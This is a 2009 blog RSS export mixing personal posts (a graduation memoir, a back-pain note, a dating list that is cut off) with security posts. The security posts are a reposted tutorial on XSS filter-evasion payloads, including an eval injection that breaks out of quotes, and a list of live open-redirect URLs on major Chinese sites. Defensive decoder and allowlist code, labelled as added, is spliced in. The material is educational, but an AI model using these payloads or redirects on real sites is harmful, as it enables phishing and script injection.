<p>Only those who lived through it with him can understand these words. I'll let them carry me back to university days, that time of dreams and many thoughts.</p>
<p>================================================================================</p>
<p>While the heavy smell of alcohol is still on me,<br>
While the warmth of last night's embraces still lingers,<br>
While the heartfelt singing still echoes in my ears,<br>
While the wild dancing still floats before my eyes,<br>
What I want to record<br>
Are those memories that, once they appeared, can never be forgotten.</p>
<p><br>
Unforgettable: Teacher N's boldness toasting our class, his moist eyes as he drank<br>
Unforgettable: the teachers and the CS3 boys downing bottles in high spirits, the hearty group photo at parting<br>
Unforgettable: the boundless enthusiasm of the CS1 classmates, the girls' matchless dreamlike dancing, Teacher ZHB's generous singing and dancing<br>
Unforgettable: the sadness of classmate L from Net3 dead drunk, the exuberance of rushing to hug the teachers<br>
Unforgettable: the thoughtful noodle soup from the Net2 classmates, the glow of sobbing in each other's arms amid the chorus<br>
Unforgettable: hugs that were never enough, reluctance that couldn't be spoken, farewell drinks that couldn't be finished, the unending song of unending love<br>
Unforgettable: every proud classmate, crying and laughing, walking and stopping, commemorating their own fragrance in alcohol and tears</p>
<p><br>
I still remember the greenness of freshman year, the novelty of going to the school bathhouse with Zhou for the first time, the nerves of my first speech in mental-health class<br>
I still remember the endless arguments with Kaida at Chuangxin, the clumsiness of my first math-modelling contest, the envy on first seeing senior Hu's program, the longing on first hearing the legends about senior Lü<br>
I still remember the student union, the ideals of writing and directing a play for the first time, the unforgettable first lead role on stage, senior sister Hu's trust and help<br>
I still remember before the injury, training flat out with Brother Ma on the sports field for the national first-class scholarship, the determination deep down to be faster than GB<br>
I still remember after the injury, while applying for leave, the faith I held onto when GB spoke the truth for me</p>
<p>I still remember when I left, the whole class's heartfelt send-off, Xiao Xin's thoughtfulness in seeing me all the way onto the train, the easy talk about each other on the way<br>
I still remember coming back to school, the excitement of the six of us in the dorm singing all night for the first time, everyone stubbornly hogging the mic</p>
<p>I still remember the gifts brought for four girls: Baoyu's Mickey hair clip, L Chen's colourful boat socks, Xiao Yan's homey photo frame<br>
I still remember that winter at minus 17 degrees, the crazy idea of the three of us climbing down the drainpipe with LM to eat at Bashu, the bliss of the Sanbao porridge shop, the desolation of nowhere to get warm<br>
I still remember the lively chatter at project-group gatherings, the exhilaration of gatherings at the apartment corner, the youthful recklessness of Net041 and 042 climbing Daheishan<br>
I still remember how bad I felt all the way seeing Kaida off to the light rail, the cowardice of avoiding the subject when I heard Shuangfei cried, the unbearable mixed feelings on seeing Xiao Tong write about L Yuan</p>
<p>I still remember the late-night Dou Dizhu excitement of freshman year, losers stripping until six naked guys fought over the quilts, great fun<br>
I still remember that losing could also mean draping a towel blanket over yourself, broom and dustpan in hand, playing Superman in the corridor, hilarious<br>
I still remember "pick the idiot" Dou Dizhu, every round one idiot squatting on the side watching<br>
I still remember Zhou's graceful Saddam dance, Lord Bao's one Mizone, five plates of rice, Li's 100 cups of coffee, the panic at the Development Zone hospital<br>
I still remember Xiao Ma sneakily eating bread, his narcissism combing his hair every day, the genius of inventing the self-cleaning wardrobe method, the glory of going XXX days without a shower<br>
I still remember Wang and me getting scammed buying phone cards on the first day, the madness of cycling to the bank to settle a bet about the yen exchange rate<br>
I still remember constantly rearranging the beds and wardrobes in the dorm in freshman year, the audacity of three beds side by side<br>
I still remember the first National Day holiday, the delicious beef from Xiao Ma's hometown, the indulgence of eating countless things in nine days<br>
I still remember the dirty jokes from the first bed-time chats, Li putting on airs from start to finish as usual<br>
I still remember that summer holiday, the boundless joy of playing Mafia with Deli, Brother Lei and Zhou, the thrill of playing volleyball in the sea for the first time<br>
I still remember those keywords: big killer, communist god, thousand-mile card, sidekick, Infernal Affairs, "blame me", "you can't afford it", "no bragging before midnight", "blessed when everyone's here"<br>
I still remember the night-time symphonies: Xiao Ma grinding his teeth, Zhou getting up in the night, Li leaping off the bed, me talking in my sleep (not Mandarin, not Wuhu dialect, not English)<br>
I still remember the high of the 99-yuan meal at Donglaishun, the waitress we flirted with at Fengzeju<br>
I still remember the "discrete graph theory closure battle" that left even GB dumbfounded~<br>
I still remember teaching Xiaopeng DOTA, after which Xiaopeng set off down the road of no return...<br>
I still remember at the corner, every night after lights out and before sleep, everyone chatting in the corridor for a while, poking and pinching each other, roughhousing..</p>
<p>I still remember last year's Daheishan, the Mafia night at Guotong, and the Discoveryland trip I couldn't join<br>
I still remember last year's many farewell dinners: what gathered was the little extravagance we had left, what dispersed was a melancholy that wouldn't go away</p>
<p>If I could choose, I wouldn't have pushed so hard back then, for training, for the scholarship<br>
If I could give up, the surgery was only for the more precious encounters later<br>
If I could let go, the awakening wouldn't have come so late, beyond words<br>
If we can meet again, today's parting is the most beautiful proof</p>
<p>If there were still an if</p>
<p>I never regret the decisions I made<br>
Never regret everything I went through after coming to the class of 05<br>
Never regret choosing Dalian Nationalities University, coming to Dalian, this sacred ground that made my heart bloom<br>
Never regret meeting every one of you, my friends, every little moment of these five years of university<br>
Let this record how we met, knew and cherished each other, memories about to be sealed away yet impossible to forget</p>
<a href="http://hi.baidu.com/harite/blog/item/d674454a4d07542a08f7ef67.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/d674454a4d07542a08f7ef67.html#comment">View comments</a>]]></description>
        <pubDate>2009年06月19日 星期五  下午 11:43</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/d674454a4d07542a08f7ef67.html</guid>
</item>

<item>
        <title><![CDATA[JavaScript for hackers (reposted)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/3cc2aec27022d8120ef477ff.html]]></link>
        <description><![CDATA[
		
		<p>From  <a href="http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/">http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/</a></p>
<p>========================================================================================</p>
<h1 class="title">JavaScript for hackers</h1>
<p class="by">By <a href="http://dev.opera.com/author/1971445">garethheyes</a> · 22 Apr, 2009</p>
<p class="tags">Published in: <a href="http://dev.opera.com/articles/tags/xss/" rel="tag">xss</a>, <a href="http://dev.opera.com/articles/tags/javascript/" rel="tag">javascript</a>, <a href="http://dev.opera.com/articles/tags/getter/" rel="tag">getter</a>, <a href="http://dev.opera.com/articles/tags/filters/" rel="tag">filters</a>, <a href="http://dev.opera.com/articles/tags/regex/" rel="tag">regex</a></p>
<div class="article">
<h2>Introduction</h2>
<p>I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security.</p>
<p>So read on and enjoy my weird and wonderful JavaScript hacks.</p>
<h2>RegExp replace can execute code</h2>
<p>When using regular expressions with <code><font face="NSimsun">replace</font></code> the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below:</p>
<pre><code>'XSS'.replace(/XSS/g,alert)</code></pre>
<p>This results in <code><font face="NSimsun">alert('XSS')</font></code>; this works because the match from the RegExp is passed to the <code><font face="NSimsun">alert</font></code> function as an argument. Normally you would use a function to perform another routine on the matched text, like so:</p>
<pre><code>'somestring'.replace(/some/, function($1){ /* do something with the matched "some" */ })</code></pre>
<p>But as you can see in the first example in this section, instead of a user defined function we are executing a native <code><font face="NSimsun">alert</font></code> call, and the arguments are passed to the native call from the regular expression. It's a cool trick and could be used to evade some XSS filters, for example if you inject a string then proceed with a dot you can then call any function you like.</p>
<p>To see how this is used in an XSS context, imagine we have an unfiltered <code><font face="NSimsun">&quot;</font></code> in the string in which an injection occurs, such as a JavaScript event or a script tag. First we inject our payload <code><font face="NSimsun">alert(1)</font></code>, then we break out of the quotes - <code><font face="NSimsun">&quot;</font></code> - and continue with our regular expression:</p>
<pre><code>.replace(/.+/,eval)//</code></pre>
<p>Notice I use <code><font face="NSimsun">eval</font></code> here to execute any code I like and the regular expression matches everything so that the full payload is passed to <code><font face="NSimsun">eval</font></code>.</p>
<p>If I put all the code together and show you the output of the page it is easier to understand what is going on:</p>
<p>Page output:</p>
<pre><code>&lt;script&gt;somevariableUnfiltered=&quot;YOUR INPUT&quot;&lt;/script&gt;</code></pre>
<p>The above code is common in analytics scripts where your search string is stored by an advertising company. You often don't see these scripts but if you view the source of a web page you'll find that they are a regular occurrence; forums are another place where they are prevalent. &quot;YOUR INPUT&quot; is the string you have control of; this is also referred to as <em>DOM based XSS</em> if the input isn't filtered correctly.</p>
<p>Input:</p>
<code><font face="NSimsun">alert(1)&quot;.replace(/.+/,eval)//</font></code>
<p>Resulting output:</p>
<code><font face="NSimsun">&lt;script&gt;somevariableUnfiltered=&quot;alert(1)&quot;.replace(/.+/,eval)//&quot;&lt;/script&gt;</font></code>
<p>Notice the single line comment used to remove the trailing quote.</p>
<h2>Unicode escapes</h2>
<p>Although it's not possible to use parentheses when escaping unicode characters, you can escape the name of the function being called, for example:</p>
<pre><code>\u0061\u006c\u0065\u0072\u0074(1)</code></pre>
<p>This calls <code><font face="NSimsun">alert(1)</font></code>; <code><font face="NSimsun">\u</font></code> indicates it's a unicode escape and the hex number after specifies the character. <code><font face="NSimsun">\u0061</font></code> is &quot;a&quot; and so on.</p>
<p>Mixing and matching unicode escapes is possible with normal characters; the example below demonstrates this:</p>
<pre><code>\u0061lert(1)</code></pre>
<p>You can also include them in strings and even evaluate them using <code><font face="NSimsun">eval</font></code>. Unicode escapes are different from normal hex or octal escapes because they can be included in a string, or in a reference to a function, variable or object.</p>
<p>The example below shows how to use unicode escapes that are evaluated and split into separate parts:</p>
<pre><code>eval('\\u'+'0061'+'lert(1)')</code></pre>
<p>By avoiding normal function names like <code><font face="NSimsun">alert</font></code>, we can fool XSS filters into letting our code through. This very example was used to bypass PHPIDS (an open source intrusion detection system), which resulted in its rules subsequently being made much stronger. If you are considering decoding JavaScript for malware analysis at runtime you need to consider the possible ways that multiple levels of encoding can work; as you can see from this example it won't be an easy task.</p>
<h2>JavaScript parser engine</h2>
<p>JavaScript is a very dynamic language. It can execute a surprising amount of code that at first glance doesn't look valid, however once you know how the parsers work, you begin to understand the logic behind it.</p>
<p>JavaScript doesn't know the result of a function until it is executed, and obviously it has to call the function to return the variable type. This leads to an interesting quirk - for example, if the returning function doesn't return a valid value for the code block, a syntax error will occur after the execution of the function.</p>
<p>What does this mean in English? Well, code speaks louder than words - check this example out:</p>
<pre><code>+alert(1)--</code></pre>
<p>The alert function executes and returns undefined but by that time it is too late - the decrement operator is expecting a number and therefore raises an error.</p>
<p>Here are a few more valid examples that don't raise errors but are interesting nevertheless.</p>
<pre><code>+alert(1)
1/alert(1)
alert(1)&gt;&gt;&gt;/abc/</code></pre>
<p>You might think the above examples are pointless, but in fact they offer great insight into how JavaScript works. Once you understand the small details the bigger picture becomes clear, and the way that your code executes can help you understand how the parser works. I find these sorts of examples useful when tracking down syntax errors and DOM based XSS, and when exploiting XSS filters.</p>
<h2>Throw, Delete what?</h2>
<p>You can use the <code><font face="NSimsun">delete</font></code> operator in ways that you wouldn't at first expect, which results in some pretty wacky syntax. Let's see what happens if we combine the <code><font face="NSimsun">throw</font></code>, <code><font face="NSimsun">delete</font></code>, <code><font face="NSimsun">not</font></code> and <code><font face="NSimsun">typeof</font></code> operators:</p>
<pre><code>throw delete~typeof~alert(1)</code></pre>
<p>Even though you'd think it couldn't possibly work, it's possible to call <code><font face="NSimsun">delete</font></code> on a function call and it still executes:</p>
<pre><code>delete alert(1)</code></pre>
<p>Here are a few more examples</p>
<pre><code>delete~[a=alert]/delete a(1)
delete [a=alert],delete a(1)</code></pre>
<p>At first glance you'd think that they would raise a syntax error, but when examining the code further it does make a kind of sense. The parser first finds a variable assignment within an array, performs the assignment and then deletes the array. Likewise the delete is performed after a function call because it needs to know the result of the function before it can delete the returned object, even if it is null.</p>
<p>Again these examples have been used to defeat XSS filters because they are often trying to match valid syntax and they don't expect the obscure nature of the code. You should consider such examples when programming your application data validation.</p>
<h2>Global objects are statements</h2>
<p>In certain instances of XSS filter evasion, it can be useful to send English-like text hidden within a vector. Clever systems like PHPIDS use English and vector comparisons to determine if a request is an attack or not, so it is a useful way to test these systems.</p>
<p>Using global objects/functions on their own can produce English-like code blocks. In fact, on the <a href="http://sla.ckers.org/">sla.ckers</a> security forum we had a little game to produce English-like sentences in JavaScript. To get an idea of how it works, check out the following example:</p>
<pre><code>stop, open, print &amp;&amp; alert(1)</code></pre>
<p>I coined the name Javascriptlish because it's possible to produce some crazy looking code:</p>
<pre><code>javascript : /is/^{ a : ' weird ' }[' &amp; wonderful ']/&quot; language &quot;
the_fun: ['never '] + stop['s']</code></pre>
<p>We use the regular expression <code><font face="NSimsun">/is/</font></code> with the operator <code><font face="NSimsun">^</font></code> and then create an object <code><font face="NSimsun">{ a : 'weird'}</font></code> (which has a property <code><font face="NSimsun">a</font></code> and an assignment of <code><font face="NSimsun">weird</font></code>.) Then we look for a property <code><font face="NSimsun">' &amp; wonderful '</font></code> within the object we just created, which is then divided by a string of <code><font face="NSimsun">language</font></code>.</p>
<p>Next we use a label called <code><font face="NSimsun">the_fun</font></code> and an array with <code><font face="NSimsun">never </font></code>, use a global function called <code><font face="NSimsun">stop</font></code> and check for a property of <code><font face="NSimsun">s</font></code> ... all of which is valid syntax.</p>
<h2>Getters/Setters fun</h2>
<p>When Firefox added the <a href="http://ejohn.org/blog/javascript-getters-and-setters/">custom syntax for setters</a> it enabled some interesting XSS vectors that didn't use parentheses. Opera doesn't support a custom syntax yet - this is good from a security point of view but not from a JavaScript hacker's perspective.</p>
<p>Opera does however support the standard <code><font face="NSimsun">__defineSetter__</font></code> syntax. This enables us to call functions via assignments, which still has some use for XSS filter evasion:</p>
<pre><code>__defineSetter__('x',alert); x=1;</code></pre>
<p>In case you're not aware of setters/getters, the example above creates a setter for the global variable <code><font face="NSimsun">x</font></code>. A setter is called whenever a variable is set with something and the argument is supplied from whatever has been assigned. The second argument is the function to be called on assignment, which is <code><font face="NSimsun">alert</font></code>. Then, when <code><font face="NSimsun">x</font></code> is assigned the value of <code><font face="NSimsun">1</font></code>, the alert function is called with <code><font face="NSimsun">1</font></code> as the argument.</p>
<h2>Location allows url encoding</h2>
<p>The <code><font face="NSimsun">location</font></code> object allows URL encoding within the JavaScript code. This allows you to further obfuscate XSS vectors by double encoding them.</p>
<pre><code>location='javascript:%61%6c%65%72%74%28%31%29'</code></pre>
<p>Combining them with unicode escapes can hide strings quite nicely:</p>
<pre><code>location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)'</code></pre>
<p>The first example works because the URL bar in Opera accepts URL-encoded strings - you can hide JavaScript syntax by URL encoding it. This is useful because when it is passed within an XSS vector you can double URL encode it to help further with filter evasion.</p>
<p>The second example combines the first technique with the unicode escape technique mentioned previously. So when you decode the string it results in the unicode representation of <code><font face="NSimsun">alert</font></code> which is <code><font face="NSimsun">\u0061\u006c\u0065\u0072\u0074</font></code>.</p>
<h2>Hackvertor: Your second brain</h2>
<p>As a JavaScript hacker I couldn't possibly remember every single encoding method that's possible with JavaScript, so I decided to create an open source tool to do the hard work for me. In the last example the string is double encoded, which can sometimes make it hard to understand. Using my <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=bG9jYXRpb249J2phdmFzY3JpcHQ6PEBkX3VuaV83PjxAZF9lbmNfNj4lNWMlNzUlMzAlMzAlMzYlMzElNWMlNzUlMzAlMzAlMzYlNjMlNWMlNzUlMzAlMzAlMzYlMzUlNWMlNzUlMzAlMzAlMzclMzIlNWMlNzUlMzAlMzAlMzclMzQ8QC9kX2VuY182PjxAL2RfdW5pXzc%2BKDEpJw%3D%3D">Hackvertor tool makes it a piece of cake</a> and it works nicely in Opera too.</p>
<p>Hackvertor works by using tags to perform multiple levels of conversion; this is similar to HTML tags, but it runs code instead of changing the display of the contained text. It converts from the innermost tag outwards, e.g. to convert the last vector it URL decodes and then decodes the unicode escapes, which results in <code><font face="NSimsun">javascript:alert(1)</font></code>.</p>
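<p>As an added example (not code from the article or from Hackvertor), the decoder below peels the two layers discussed here, URL encoding and then <code>\u</code> escapes, repeatedly until nothing changes, and shows why a filter has to match on the normalised form rather than on the raw input. The sample vectors are constructed from the shapes shown in this article; it runs under Node.js.</p>

```javascript
// Added example, not code from the article or from Hackvertor: peel the
// encoding layers the article describes, innermost first, so that a
// filter or an analyst can inspect the decoded form instead of the raw
// vector. Only the two layers the article covers are handled: %XX URL
// encoding and JavaScript \uXXXX escapes.
'use strict';

// Decode \uXXXX escapes ("Unicode escapes" section). This is the ordinary,
// legitimate use of replace() with a callback that the article contrasts
// with passing a native function such as alert.
function decodeUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g,
    (match, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Decode %XX sequences ("Location allows url encoding" section).
// decodeURIComponent throws on malformed input such as a trailing "%";
// a decoder used for inspection must not die on that, so it falls back
// to returning the input unchanged.
function decodePercent(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return s;
  }
}

// Apply both decoders until the string stops changing, so double URL
// encoding (%2561 -> %61 -> a) is handled too. The round cap bounds the
// work on pathological input. Returns the decoded string and the number
// of rounds that changed something.
function normalize(vector, maxRounds = 8) {
  let cur = vector;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeUnicodeEscapes(decodePercent(cur));
    if (next === cur) {
      return { decoded: cur, rounds: i };
    }
    cur = next;
  }
  return { decoded: cur, rounds: maxRounds };
}

// A naive filter: does the text contain a call to the named function?
function containsCall(text, name) {
  return text.indexOf(name + '(') !== -1;
}

// Constructed sample vectors in the shapes the article shows, plus one
// double URL-encoded variant.
const SAMPLES = [
  'javascript:alert(1)',
  'javascript:%61%6c%65%72%74%28%31%29',
  'javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35' +
    '%5c%75%30%30%37%32%5c%75%30%30%37%34(1)',
  '\\u0061lert(1)',
  'javascript:%2561%256c%2565%2572%2574(1)',
];

// Compare the naive filter on the raw vector with the same filter on the
// normalised form: only the first sample matches raw, all five match decoded.
function report(samples = SAMPLES) {
  return samples.map(v => {
    const { decoded, rounds } = normalize(v);
    return {
      raw: v,
      decoded,
      rounds,
      rawMatch: containsCall(v, 'alert'),
      decodedMatch: containsCall(decoded, 'alert'),
    };
  });
}

for (const row of report()) {
  console.log(JSON.stringify(row));
}
```

Other layers (octal and hex string escapes, HTML entities, <code>String.fromCharCode</code>) are out of scope here; a normaliser used in front of a filter needs a decoder for every layer the input can carry.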
</div>
<p> </p> <a href="http://hi.baidu.com/harite/blog/item/3cc2aec27022d8120ef477ff.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%B0%B2%C8%AB%BC%BC%CA%F5">Security Techniques</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/3cc2aec27022d8120ef477ff.html#comment">View comments</a>]]></description>
        <pubDate>2009年06月16日 星期二  下午 08:57</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/3cc2aec27022d8120ef477ff.html</guid>
</item>

<item>
        <title><![CDATA[It Finally Came]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/b7a5ddcaa257a44ef21fe798.html]]></link>
        <description><![CDATA[
		
		<p>For the past month or two I have felt that my sleep has been really poor, with a vague pain in my lower back whenever I sleep. Last night was the worst: I went to bed at 11 but barely slept all night, and had to toss and turn constantly or my back would hurt terribly. It was too intense; I couldn't take it any more. This morning I took leave and went to the hospital for a check-up, and it turned out to be a lumbar disc protrusion. Sigh... the legendary &ldquo;white-collar disease&rdquo;. It puzzles me: I'm not a &ldquo;white-collar worker&rdquo;, yet I got it too. Sob.</p>
<p>A message to my comrades fighting on the industry's front line: be sure to get physical exercise, especially those of you who sit in an office all day; be sure to &ldquo;avoid sitting too long, avoid standing too long&rdquo;. Do lower-back and neck exercises often. Otherwise... no matter how good your health used to be, it will be a huge hidden danger. The doctor's words &ldquo;scared&rdquo; me; I wonder whether my words have &ldquo;scared&rdquo; you?</p> <a href="http://hi.baidu.com/harite/blog/item/b7a5ddcaa257a44ef21fe798.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/b7a5ddcaa257a44ef21fe798.html#comment">View comments</a>]]></description>
        <pubDate>2009年05月12日 星期二  上午 11:03</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/b7a5ddcaa257a44ef21fe798.html</guid>
</item>

<item>
        <title><![CDATA[CGI "redirect vulnerabilities" on several major sites]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/d03606339ac999f01a4cff88.html]]></link>
        <description><![CDATA[
		
		<p>Recently I have noticed some malicious URLs being spread through the CGI &ldquo;redirect vulnerabilities&rdquo; of the following major sites. Perhaps they should take a look at their CGI programs and add some restrictions; nobody wants every phishing and drive-by-download domain out there to look like a legitimate website.</p>
<p>PS: some of these are paid advertising links, in which case there is nothing to say; go ahead and make your money.</p>
<p>Hexun redirect<br>
<a href="http://wizard.stock.hexun.com/other/tj.aspx?p=135&amp;url=http://hi.baidu.com/harite">http://wizard.stock.hexun.com/other/tj.aspx?p=135&amp;url=http://hi.baidu.com/harite</a></p>
<p> </p>
<p>51.com statistics redirect<br>
<a href="http://tj.51.com/?formType=3201&amp;go=1&amp;url=http://hi.baidu.com/harite">http://tj.51.com/?formType=3201&amp;go=1&amp;url=http://hi.baidu.com/harite</a></p>
<p> </p>
<p>Sohu redirect<br>
<a href="http://doc.go.sohu.com/200803/eabe8074ec19493e28518d97dcffc66d.php?url=http://hi.baidu.com/harite">http://doc.go.sohu.com/200803/eabe8074ec19493e28518d97dcffc66d.php?url=http://hi.baidu.com/harite</a></p>
<p><a href="http://adc.go.sohu.com/200701/eaf743c3305b93fb4b50889ed398f0fc.php?url=http://hi.baidu.com/harite">http://adc.go.sohu.com/200701/eaf743c3305b93fb4b50889ed398f0fc.php?url=http://hi.baidu.com/harite</a></p>
<p> </p>
<p>Mop paging, embeds an arbitrary frame<br>
<a href="http://tt.mop.com/main.jsp?url=http://hi.baidu.com/harite">http://tt.mop.com/main.jsp?url=http://hi.baidu.com/harite</a></p>
<p> </p>
<p>NetEase 163 site redirect<br>
<a href="http://pro.163.com////event.ng/Type=&amp;Redirect=http://hi.baidu.com/harite">http://%70ro.163.com/\/\event.ng/Type=&amp;Redirect=http://hi.baidu.com/harite</a></p>
<p>ChinaZ statistics system site redirect (HTTP 302 redirect)<br>
<a href="http://alexa.chinaz.com/redirect.asp?id=url=httep://bsog.cn/index.asp=&amp;url=hi.baidu.com/harite">http://alexa.chinaz.com/redirect.asp?id=url=httep://bsog.cn/index.asp=&amp;url=hi.baidu.com/harite</a></p>
<p>Youku redirect<br>
<a href="http://hz.youku.com/red/click.php?tp=1&amp;cp=2009185&amp;cpp=1000093&amp;url=http://hi.baidu.com/harite">http://hz.youku.com/red/click.php?tp=1&amp;cp=2009185&amp;cpp=1000093&amp;url=http://hi.baidu.com/harite</a></p>
<p> </p>
<p> </p>
<p>There are many others, blogs and the like, but their reach is smaller than those above.</p>
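<p>As an added example (not code from this post or from any of the sites listed), here is the kind of restriction the post asks for: a server-side check that resolves the <code>url</code> parameter and only issues the redirect when the resulting host is on an allowlist. It assumes a hypothetical site at www.example.com and runs under Node.js, whose built-in WHATWG URL parser normalises the percent-encoded host and backslash path shown in the 163 entry above.</p>

```javascript
// Added example, not code from the post or from any of the sites it names:
// an allowlist check on the redirect target, run before the CGI issues its
// 302. Uses Node's built-in WHATWG URL parser; the site origin and the
// allowed hosts are constructed for the example.
'use strict';

// Hosts this hypothetical site is willing to send users to.
const ALLOWED_HOSTS = new Set(['www.example.com', 'static.example.com']);

// Resolve the raw "url=" parameter the way a browser would, relative to the
// redirecting site, so the decision is made on the host the user would
// actually land on rather than on the raw string. The parser decodes the
// percent-encoded host (%70ro.163.com -> pro.163.com) and turns the
// backslashes in the path into slashes, which a substring check on the raw
// parameter would miss.
function classifyRedirect(rawTarget, siteOrigin = 'http://www.example.com') {
  let url;
  try {
    url = new URL(rawTarget, siteOrigin);
  } catch (e) {
    return { allowed: false, reason: 'unparseable' };
  }
  // Only web schemes may be redirected to; this also rejects javascript: URLs.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { allowed: false, reason: 'scheme ' + url.protocol };
  }
  // Exact host match, never a prefix match, so www.example.com.evil.net fails.
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    return { allowed: false, reason: 'host ' + url.hostname };
  }
  return { allowed: true, target: url.href };
}

// Constructed sample values of the url= parameter.
const SAMPLE_TARGETS = [
  '/account/home',                                  // relative: stays on site
  'https://static.example.com/p?x=1',               // allowlisted host
  'http://hi.baidu.com/harite',                     // arbitrary external host
  'http://%70ro.163.com/\\/\\event.ng?Redirect=x',  // encoded host from the post
  '//evil.example.net/landing',                     // protocol-relative
  'http://www.example.com.evil.net/',               // allowlisted host as a prefix
  'javascript:alert(1)',                            // non-web scheme
];

function report(targets = SAMPLE_TARGETS) {
  return targets.map(t => ({ input: t, ...classifyRedirect(t) }));
}

for (const row of report()) {
  console.log(JSON.stringify(row));
}
```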
<p>If you have a channel to notify them to fix these, I would be very grateful :-)</p> <a href="http://hi.baidu.com/harite/blog/item/d03606339ac999f01a4cff88.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%B0%B2%C8%AB%BC%BC%CA%F5">Security Techniques</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/d03606339ac999f01a4cff88.html#comment">View comments</a>]]></description>
        <pubDate>2009年04月17日 星期五  上午 10:12</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/d03606339ac999f01a4cff88.html</guid>
</item>

<item>
        <title><![CDATA[Sixteen Kinds of Girls Worth Getting Close To (reposted)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/2fb8fa1fbed57afde1fe0b3f.html]]></link>
        <description><![CDATA[
		
		<h1 style="font-size: 18px; margin-bottom: 8px"><font color="#0000ff">Sixteen Kinds of Girls Worth Getting Close To</font></h1>
<p><font size="4"><font color="#0000ff">1. She wants to keep you company, even online, without saying a word. When you're happy, she wants to be by your side to see you smile. When you're down, she's the first to be there comforting you, racking her brains to help you. When you stay up late, her QQ or MSN stays lit up alongside yours. If you log off and then log back on, her avatar has gone dark. Did you know? She stayed up that late only to wait for you.<br>
<br>
2. She is sensible, and knows when to act coquettish and when to cherish you the way you would a child. If you're a student, she won't willfully demand that you skip class to go shopping with her, and won't make you, with no income of your own, buy luxury goods. If you're already working, she won't complain that you forgot to call her, won't demand sweet talk when work is troubling you, and even when she's in a bad mood she'll gently hold you and always stand on your side.<br>
</font><br>
<font color="#0000ff">3. She doesn't miss any information about you, and blends into your life and your circle of friends. She gets to know your friends, follows the links to the page of any friend who leaves a message on your space, watches the films and reads the books you like, goes to the restaurants you like, browses the brand stores you like, and even clumsily imitates the type of the opposite sex you admire. It's not that she isn't good enough; she wants to become better, more suited to you, more likely to win your approval and praise.</font><br>
<br>
<font color="#0000ff">4. She will never bring up your shortcomings or laugh at you in front of your colleagues, classmates, family or friends, not even as a joke. She may think that what you do is wrong, but she'll give you the face a man needs, smooth things over for you, find you a way to save face, and only show off the happiness and speak of your good points. </font><br>
<br>
</font><font size="4"><font color="#0000ff">5. She needs your shoulder, but will never depend on you for everything. She is weak in front of you and often needs you to take charge. Not because she's dumb; she just likes to play dumb in front of you and likes being looked after by you. But she won't cling to you and treat you like a nanny; when she should be independent, she can be on her own. <br>
<br>
6. She won't always ask you to be the one to give in. A man should know how to be tolerant and accommodating, not because she is a woman but because you are a man. Yet she will never be spoiled by this into waiting from start to finish for you to apologize first; instead she'll very carefully act cute with you to win your forgiveness.<br>
<br>
7. The text messages she sends you almost never have typos or ambiguities. She pays great attention to every detail of being with you, and double-checks a message several times before sending it: wording, tone, even the emoticons. <br>
<br>
8. When out with you and your friends she dresses up nicely but never seductively; only in front of you will she occasionally wear something very hot. She will always treat you differently from other guys, rather than always showing her beauty to everyone like a peacock spreading its tail.<br>
<br>
9. When she sees women circling around you she gets jealous, and the more outstanding those women are the more easily she gets jealous, but she won't make a scene or interrogate you. She cares about you, values you, wants to hold on to you. As long as you are patient, don't be stingy with the words that reassure her. All she needs is a sentence that no one else can hear and only she can.<br>
<br>
10. She may have many male friends and perhaps no shortage of admirers, but she will tell them clearly that it's you she likes, and she won't measure you against their strengths. Now and then she'll tell you that so-and-so wants to pursue her, and seeing the nervous look on your face she'll contentedly add, there's only you in my heart o(∩_∩)o... It's not that she's bored; she really needs to feel valued. <br>
<br>
11. A good girl is also filial. She not only knows how to be filial to her own parents, she also respects the old and cares for the young, bringing her tenderness and delicacy into full play and making people feel bathed in a spring breeze.<br>
<br>
12. A good girl knows how to respect feelings. A truly good girl, whether or not she has been hurt by love before, carries no resentment and never speaks ill of her ex-boyfriends. She keeps the past, whether painful or sweet memories, deep in her own heart, as a kind of growth, a kind of experience.<br>
<br>
13. A good girl has a touch of childlike innocence. She can always see others through the purest and kindest eyes. In her eyes there is no lack of beauty, because her gaze only chases beauty and will not be invaded by ugliness.<br>
